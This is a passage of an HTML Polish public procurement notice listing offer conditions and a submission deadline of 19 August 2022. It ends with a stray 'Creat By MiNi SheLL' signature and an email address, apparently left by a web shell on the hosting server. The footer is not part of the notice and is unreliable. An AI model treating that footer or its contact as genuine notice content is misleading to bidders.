(zgodnie z wzorem formularza oferty – załącznik nr 1 do SWZ);<br/>2. Doświadczenie osoby wyznaczonej do realizacji zamówienia do kryterium oceny ofert;<br/>3. Pełnomocnictwo o ile ofertę składa pełnomocnik;<br/>4. Oświadczenie wykonawców wspólnie ubiegających się o udzielenie zamówienia - jeżeli dotyczy;<br/>5. Zobowiązanie podmiotu trzeciego - jeżeli dotyczy <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy występujący wspólnie są zobowiązani do ustanowienia pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie przedmiotowego zamówienia publicznego <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-08-19 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Oferty należy składać za pośrednictwem platformy - Platformazakupowa.pl Strona postępowania: https://platformazakupowa.pl/pn/asp.lodz</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-08-19 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-09-16</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com